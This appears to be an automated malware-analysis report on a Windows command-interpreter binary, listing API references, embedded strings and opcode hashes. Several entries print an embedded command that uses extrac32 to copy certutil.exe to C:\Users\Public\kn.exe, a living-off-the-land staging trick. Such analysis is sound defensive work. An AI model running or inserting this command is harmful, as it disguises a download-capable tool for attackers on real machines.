                                              • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                              • API String ID: 198002717-267741548
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: iswdigitiswspacewcschr
                                              • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                              • API String ID: 1595556998-2755026540
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                              • String ID: "$=,;
                                              • API String ID: 3545743878-4143597401
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: CurrentFormatMessageThread
                                              • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                              • API String ID: 2411632146-3173542853
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: CreateFile_open_osfhandle
                                              • String ID: con
                                              • API String ID: 2905481843-4257191772
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                              • String ID:
                                              • API String ID: 3829876242-3916222277
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                              • String ID: CSVFS$NTFS$REFS
                                              • API String ID: 3510147486-2605508654
                                              APIs
                                              • longjmp.MSVCRT(?,00000000,00000000,00007FF6EB177279,?,?,?,?,?,00007FF6EB17BFA9), ref: 00007FF6EB194485
                                              Strings
                                              Similarity
                                              • API ID: longjmp
                                              • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                              • API String ID: 1832741078-366822981
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: Heapwcschr$AllocateProcessmemset
                                              • String ID: -$:.\$=,;$=,;+/[] "
                                              • API String ID: 2060774286-969133440
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                              • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                              • API String ID: 1606811317-2340392073
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: memset$ErrorLast$InformationVolume
                                              • String ID: %04X-%04X$~
                                              • API String ID: 2748242238-2468825380
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                              • String ID: +-~!$APerformUnaryOperation: '%c'
                                              • API String ID: 2348642995-441775793
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                              • String ID: FAT$~
                                              • API String ID: 2238823677-1832570214
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D884
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D89D
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D94D
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D964
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB17DB89
                                              • wcstol.MSVCRT ref: 00007FF6EB17DBDF
                                              • wcstol.MSVCRT ref: 00007FF6EB17DC63
                                              • memmove.MSVCRT ref: 00007FF6EB17DD33
                                              • memmove.MSVCRT ref: 00007FF6EB17DE9A
                                              • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17DF1F
                                              Similarity
                                              • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                              • String ID:
                                              • API String ID: 1051989028-0
                                              • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                              • Instruction ID: fd5e218cc736c01176c38da9c780b78f46bf57c2b01e293d6ce791817e98fa58
                                              • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                              • Instruction Fuzzy Hash: D10293B3A0C75981EA209F14E4403B976A1FB8EBA8F544135DA8D937E4DFBEE041C709
                                              Similarity
                                              • API ID: Heap$_wcsicmp$AllocProcess
                                              • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                              • API String ID: 3223794493-3086019870
                                              • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                              • Instruction ID: c63fc7a51b6e876bf093b78b404274974c4dbaa7283ffc5fc01cd06892352b28
                                              • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                              • Instruction Fuzzy Hash: E3518F23A08A42C6EB158B15E4503F97BA1FB4EBA8F584134C91E873B4DF7EE445C71A
                                              Similarity
                                              • API ID:
                                              • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                              • API String ID: 0-3124875276
                                              • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                              • Instruction ID: 9c611f5caeab65f055414132ba03f641f3da6a75506b94537e7462cbd08bb736
                                              • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                              • Instruction Fuzzy Hash: 4D516D22A0C64382F7159F21A4143F97AA1BF4DBADF445135DA4EC62B4DF3EA409878B
                                              APIs
                                                • Part of subcall function 00007FF6EB1858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6EB19C6DB), ref: 00007FF6EB1858EF
                                                • Part of subcall function 00007FF6EB18081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB18084E
                                              • towupper.MSVCRT ref: 00007FF6EB19C1C9
                                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB19C31C
                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF6EB19C5CB
                                              Similarity
                                              • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                              • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                              • API String ID: 2242554020-619615743
                                              • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                              • Instruction ID: 47d8aee8119f689f0d92b522beaffd5b599f0b59cdbbaaef9eee4e62588d56d7
                                              • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                              • Instruction Fuzzy Hash: C312C523A0869281EA249B15A4443FA67A0FF4DBB8F544235D9DE837F4DF3EE541C70A
                                              Similarity
                                              • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                              • String ID: \\.\
                                              • API String ID: 799470305-2900601889
                                              • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                              • Instruction ID: c921b16e3b583b01f8a1ae33f6fe78510b67b411945271d4a11eab010e8593f6
                                              • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                              • Instruction Fuzzy Hash: 8B51A033A08B82C5EB618F20E8013F967A0FB8DBA8F495535DA4E87BA4DF3DD5458705
                                              Similarity
                                              • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                              • String ID:
                                              • API String ID: 1944892715-0
                                              • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                              • Instruction ID: f2092faddc1625b93311e241ef154c6c1914ecd13368dbc7987ab56f4d6cdf95
                                              • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                              • Instruction Fuzzy Hash: A5B1A463A09642C6EA619F12E4543F966A1FF4EBA8F444035CA4EC73F1DF7EE444870A
                                              APIs
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1754DE
                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB17552B
                                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB17554F
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB19345F
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB19347E
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB1934C3
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1934DB
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB1934FA
                                                • Part of subcall function 00007FF6EB1836EC: _get_osfhandle.MSVCRT ref: 00007FF6EB183715
                                                • Part of subcall function 00007FF6EB1836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB183770
                                                • Part of subcall function 00007FF6EB1836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB183791
                                              Similarity
                                              • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                              • String ID:
                                              • API String ID: 1356649289-0
                                              • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                              • Instruction ID: 025797300da41e52b255f845c3479cecd4e98ec701baa0ceef90b22512e442ca
                                              • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                              • Instruction Fuzzy Hash: 74917033A0864297E6149F25F5043B9B6A1FB8EBA8F544135DA4E837B4DF3EE444CB09
                                              Similarity
                                              • API ID: LocalTime$ErrorLast_get_osfhandle
                                              • String ID: %s$/-.$:
                                              • API String ID: 1644023181-879152773
                                              • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                              • Instruction ID: 623062c682240c52717e7163109dea228bfc3fdab39ca7f16fb536e340e7d60a
                                              • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                              • Instruction Fuzzy Hash: 9891A123A1868295EB169B24D4403FA62B0FF88BE8F544136DA4EC36F4DF3EE545C716
                                              APIs
                                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB197251), ref: 00007FF6EB19628E
                                              Similarity
                                              • API ID: ObjectSingleWait
                                              • String ID: wil
                                              • API String ID: 24740636-1589926490
                                              • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                              • Instruction ID: dd63e7e43eb7bbc65fad40cfe496e355d5b8fec6f4dcc69cce32f3716d05a497
                                              • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                              • Instruction Fuzzy Hash: 14416523A0858283F7604B55E5403FD76A1EF897E9F608131D90DC66E8CF3EE649CB16
                                              Similarity
                                              • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                              • String ID: $Application$System
                                              • API String ID: 3377411628-1881496484
                                              • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                              • Instruction ID: 957de4751ade5263892d29ccecac40bd479dc6475024747eadde3c126749b463
                                              • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                              • Instruction Fuzzy Hash: 51413833B04B429AE7108B60E4403ED77A5FB8D758F445135DA4E82BA8EF39E149C745
                                              Similarity
                                              • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                              • String ID: :$\
                                              • API String ID: 3961617410-1166558509
                                              • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                              • Instruction ID: 013a2b510f4e1a1cd9f999fca9265c15e42033a515d752337a67516eb43014be
                                              • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                              • Instruction Fuzzy Hash: A7216023A0864286EB544B60A5442F9A6A1FB4FBACF448131D91FC37B0DF7DE4498A06
                                              Similarity
                                              • API ID: CreateDirectoryDriveFullNamePathTypememset
                                              • String ID:
                                              • API String ID: 1397130798-0
                                              • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                              • Instruction ID: b9f3517ef87311d57dcdab519783dd75ac70c5fbe45a5c8dc241fa6b497d1f55
                                              • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                              • Instruction Fuzzy Hash: E191B223B18B8286EB658B10E5403F973A1FF4DBA8F448135DA4E837A4DF7EE5448706
                                              APIs
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806D6
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806F0
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB18074D
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB180762
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB1825CA
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB1825E8
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB18260F
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB182636
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB182650
                                              Similarity
                                              • API ID: _wcsicmp$Heap$AllocProcess
                                              • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                              • API String ID: 3407644289-1668778490
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                              • String ID: &()[]{}^=;!%'+,`~
                                              • API String ID: 2516562204-381716982
                                              APIs
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • iswspace.MSVCRT ref: 00007FF6EB187EEE
                                              Strings
                                              Similarity
                                              • API ID: wcschr$Heapiswspace$AllocProcess
                                              • String ID: A
                                              • API String ID: 3731854180-3554254475
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                              • String ID: NTDLL.DLL$NtQueryInformationProcess
                                              • API String ID: 1580871199-2613899276
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                              • String ID: con
                                              • API String ID: 689241570-4257191772
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                              • String ID: PE
                                              • API String ID: 2941894976-4258593460
                                              APIs
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6EB19849D,?,?,?,00007FF6EB19F0C7), ref: 00007FF6EB180045
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6EB19F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB180071
                                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB180092
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB1800A7
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB180148
                                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB180181
                                              Similarity
                                              • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                              • String ID:
                                              • API String ID: 734197835-0
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: Enum$Openwcsrchr
                                              • String ID: %s=%s$.$\Shell\Open\Command
                                              • API String ID: 3402383852-1459555574
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: memset$wcscmp
                                              • String ID: %s
                                              • API String ID: 243296809-3043279178
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: memset$EnvironmentVariable
                                              • String ID: DIRCMD
                                              • API String ID: 1405722092-1465291664
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
                                              • String ID: FOR$ IF
                                              • API String ID: 557945885-2924197646
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: iswdigit$iswspacewcschr
                                              • String ID: )$=,;
                                              • API String ID: 1959970872-2167043656
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                              • String ID: %04X-%04X$:
                                              • API String ID: 930873262-1938371929
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                              • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                              • API String ID: 3249344982-2616576482
                                              • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                              • Instruction ID: f86b5159d5a5c848605d13e110b658d0cfee45f5bbf3a5a953eeabae2e2916e0
                                              • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                              • Instruction Fuzzy Hash: 59417173A18B4186E3108F11A9443A9BAA4FB4DFE8F484234EA4D877A8CF7DD1158B05
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: wcschr$iswdigit
                                              • String ID: +-~!$<>+-*/%()|^&=,
                                              • API String ID: 2770779731-632268628
                                              • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                              • Instruction ID: 472b3129e3548d39ca848f1a81b66bfba1b0d1af9048d41cda148cac636fec46
                                              • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                              • Instruction Fuzzy Hash: 5E310D23609A56C5E6509F91F4503B9B7A0FB4DFA9B458135DA4E83374EF3EE404C706
                                              APIs
                                              Similarity
                                              • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                              • String ID:
                                              • API String ID: 3192234081-0
                                              • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                              • Instruction ID: e19ea9c48758fcf2ae5c322ec63986ad6d96848224a672fa183f3a8eaaffe353
                                              • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                              • Instruction Fuzzy Hash: 9D3188326086528BE7109F21F4047BDBB51FB8EBA8F449134DE4A977A5CF3DD4058B05
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB181673
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB18168D
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB181757
                                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB18176E
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB181788
                                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6EB1814D6,?,?,?,00007FF6EB17AA22,?,?,?,00007FF6EB17847E), ref: 00007FF6EB18179C
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Size
                                              • String ID:
                                              • API String ID: 3586862581-0
                                              • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                              • Instruction ID: 1d15ae4026c25637d911d58680faad9027f113815635cc8e1c4069856e2684ec
                                              • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                              • Instruction Fuzzy Hash: 87917E23A09B4281EA118B15E5503F8B7A1FB4DBA8F598139DE4D833B4DF3EE455C70A
                                              APIs
                                              Similarity
                                              • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                              • String ID:
                                              • API String ID: 1313749407-0
                                              • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                              • Instruction ID: 10d62423b2bcc66fdcd567799fa2fab4d19d988bbe3890003d48e03c56fb227d
                                              • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                              • Instruction Fuzzy Hash: 6C51F823A0878282FA519B15A9143F9A6A1FF4DBB8F184134CD1E977F4DF3EE440870A
                                              APIs
                                              Similarity
                                              • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                              • String ID:
                                              • API String ID: 920682188-0
                                              • Opcode ID: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
                                              • Instruction ID: 214cb7e0246f82e835fad5978f8eb8ed1e71b35dcdd9d7fe295960f9edae907b
                                              • Opcode Fuzzy Hash: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
                                              • Instruction Fuzzy Hash: CD512533605B818AEB25CF20E8543E877A0FB8DB98F048135CA4E87764EF3DD6598B05
                                              APIs
                                              Strings
                                              • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF6EB17E00B
                                              Similarity
                                              • API ID: Heap$FreeProcess_setjmp
                                              • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                              • API String ID: 777023205-3344945345
                                              • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                              • Instruction ID: cf36f06f133a62bc00b5ab22ec418b7a044bb8251ed11f02a5af64e0218fa24b
                                              • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                              • Instruction Fuzzy Hash: 84512633A0DA52C5EA518B15F8903B8B6A4FF4DB6CF544436D90DC33B9DF7EA441860A
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: iswdigit$iswspacewcschr
                                              • String ID: )$=,;
                                              • API String ID: 1959970872-2167043656
                                              • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                              • Instruction ID: df352250d109ca7956a985ed79e3d3c9b5db8d09ff17967d40cd9a149b8d7bfb
                                              • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                              • Instruction Fuzzy Hash: 8B416C67E182E2C6FB648B10D5543FA27A0AF1A779F545035C989832F4CF7EA4458A0B
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: _wcsnicmpfprintfwcsrchr
                                              • String ID: CMD Internal Error %s$%s$Null environment
                                              • API String ID: 3625580822-2781220306
                                              • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                              • Instruction ID: 4da7d131c2df6112f642493ada3866c8399b1c262815b78d8db4fc0bb442522a
                                              • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                              • Instruction Fuzzy Hash: 5831D023A0868682EA109B42E5003FA72A1BB4DBF8F044134DD1D977F5EF3EF495834A
                                              APIs
                                              Similarity
                                              • API ID: memsetwcsspn
                                              • String ID:
                                              • API String ID: 3809306610-0
                                              • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                              • Instruction ID: a73a8792297089c6f666fa89e20f1ad291be07f4851f4fb20ae85c6dd45a969f
                                              • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                              • Instruction Fuzzy Hash: A8B1A163A08B4682EA518F15E4503F9B7A1FB4DBA8F848031DA4E877B4DF7EE441C746
                                              APIs
                                              Similarity
                                              • API ID: wcschr$iswdigit$wcstol
                                              • String ID:
                                              • API String ID: 3841054028-0
                                              • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                              • Instruction ID: f705a1376a5a0a4531b07d25c2524e1a6d5d84d741a4950ec48c58d010215ea7
                                              • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                              • Instruction Fuzzy Hash: 7D51E62790869291E7219B1598003F976F1FF6DBB8B448232DE5DC22F4DF3EE441C219
                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB193687
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6EB17260D), ref: 00007FF6EB1936A6
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6EB17260D), ref: 00007FF6EB1936EB
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB193703
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6EB17260D), ref: 00007FF6EB193722
                                              Similarity
                                              • API ID: Console$Write_get_osfhandle$Mode
                                              • String ID:
                                              • API String ID: 1066134489-0
                                              • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                              • Instruction ID: 01f2b038ad897706f8ea4c72be0d3401893fb57f339805cbe8791a25fb78edac
